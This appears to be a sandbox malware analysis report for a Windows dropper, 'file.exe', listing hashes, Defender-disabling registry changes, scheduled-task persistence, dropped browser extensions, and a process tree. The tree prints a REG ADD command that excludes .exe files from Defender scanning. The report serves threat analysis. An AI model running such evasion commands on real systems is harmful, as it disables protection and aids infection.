Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
07/01/2023, 18:34
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
f5e2fb884e9b4c4e9364fc286727340a
-
SHA1
92819865c3e7c9d449f63e49ddef8d1c303080ff
-
SHA256
6023edbce6f5c541aa1703e2a34a0dcfe1ff7e189e1705c9a1c4486da8cab14c
-
SHA512
dc5b14d3c17df918ecaaafa88f4429e95c11621c84118fb726f2b0b2d15ca4e86b5416e343c9e998c298e4e55c1439541984f3d69bd9a1a7cfcef397d504dbfe
-
SSDEEP
196608:91O/sruHn4TrS9xWK12ZszTJvY7/UvEoVt:3OeuHMraMXa+FIt
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BjvgkLgoU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETlMoSXAKBfU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xOXloLrYuJMznnLuiyR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EgLUknTySUlyFxVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lkHAEDYevLoxC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BjvgkLgoU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jtlBjnUcyHUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lkHAEDYevLoxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xOXloLrYuJMznnLuiyR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jtlBjnUcyHUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETlMoSXAKBfU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EgLUknTySUlyFxVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 880 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1460 Install.exe 1852 Install.exe 680 dfgYjxP.exe 808 vclgNht.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\International\Geo\Nation vclgNht.exe -
Loads dropped DLL 12 IoCs
pid Process 1472 file.exe 1460 Install.exe 1460 Install.exe 1460 Install.exe 1460 Install.exe 1852 Install.exe 1852 Install.exe 1852 Install.exe 880 rundll32.exe 880 rundll32.exe 880 rundll32.exe 880 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json vclgNht.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vclgNht.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vclgNht.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D vclgNht.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vclgNht.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vclgNht.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 vclgNht.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 vclgNht.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini dfgYjxP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vclgNht.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D vclgNht.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol dfgYjxP.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dfgYjxP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat vclgNht.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vclgNht.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vclgNht.exe File created C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\dasdwCI.xml vclgNht.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vclgNht.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vclgNht.exe File created C:\Program Files (x86)\BjvgkLgoU\ErZeYfF.xml vclgNht.exe File created C:\Program Files (x86)\ETlMoSXAKBfU2\ZLQUJMcjgPPjm.dll vclgNht.exe File created C:\Program Files (x86)\ETlMoSXAKBfU2\JSfpubN.xml vclgNht.exe File created C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\QLwqyXB.dll vclgNht.exe File created C:\Program Files (x86)\lkHAEDYevLoxC\SQgfSIs.dll vclgNht.exe File created C:\Program Files (x86)\lkHAEDYevLoxC\WZEqTFX.xml vclgNht.exe File created C:\Program Files (x86)\BjvgkLgoU\LUMjPj.dll vclgNht.exe File created C:\Program Files (x86)\jtlBjnUcyHUn\sUDZCCk.dll vclgNht.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\boqjQyEgeBagneJBps.job schtasks.exe File created C:\Windows\Tasks\SqCKrsanZcXdLkunv.job schtasks.exe File created C:\Windows\Tasks\eTxnbZekOUBRWtJ.job schtasks.exe File created C:\Windows\Tasks\epwDgMxkovfKwwbuy.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1588 schtasks.exe 2020 schtasks.exe 1092 schtasks.exe 1872 schtasks.exe 1044 schtasks.exe 732 schtasks.exe 1856 schtasks.exe 1788 schtasks.exe 1756 schtasks.exe 532 schtasks.exe 848 schtasks.exe 1856 schtasks.exe 912 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings vclgNht.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecisionTime = 8018324acf22d901 vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionTime = 8018324acf22d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix vclgNht.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vclgNht.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecision = "0" vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\5e-2f-ac-5a-ab-cd rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadDecisionReason = "1" vclgNht.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\WpadNetworkName = "Network" vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionReason = "1" vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates vclgNht.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0032000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA} vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCDBC71C-7792-4BBF-9601-BDE99DC579CA}\5e-2f-ac-5a-ab-cd vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" vclgNht.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecisionTime = 8018324acf22d901 vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs vclgNht.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-2f-ac-5a-ab-cd\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs vclgNht.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1352 powershell.EXE 1352 powershell.EXE 1352 powershell.EXE 1092 powershell.EXE 1092 powershell.EXE 1092 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 1008 powershell.EXE 1008 powershell.EXE 1008 powershell.EXE 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe 808 vclgNht.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1352 powershell.EXE Token: SeDebugPrivilege 1092 powershell.EXE Token: SeDebugPrivilege 1700 powershell.EXE Token: SeDebugPrivilege 1008 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1472 wrote to memory of 1460 1472 file.exe 28 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1460 wrote to memory of 1852 1460 Install.exe 29 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 1932 1852 Install.exe 31 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1852 wrote to memory of 984 1852 Install.exe 33 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 1932 wrote to memory of 596 1932 forfiles.exe 35 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 984 wrote to memory of 1648 984 forfiles.exe 36 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 596 wrote to memory of 904 596 cmd.exe 37 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 1784 1648 cmd.exe 38 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 1648 wrote to memory of 912 1648 cmd.exe 40 PID 596 wrote to memory of 1044 596 cmd.exe 39 PID 596 wrote to memory of 1044 596 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\7zS2B0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\7zS723.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:596 -
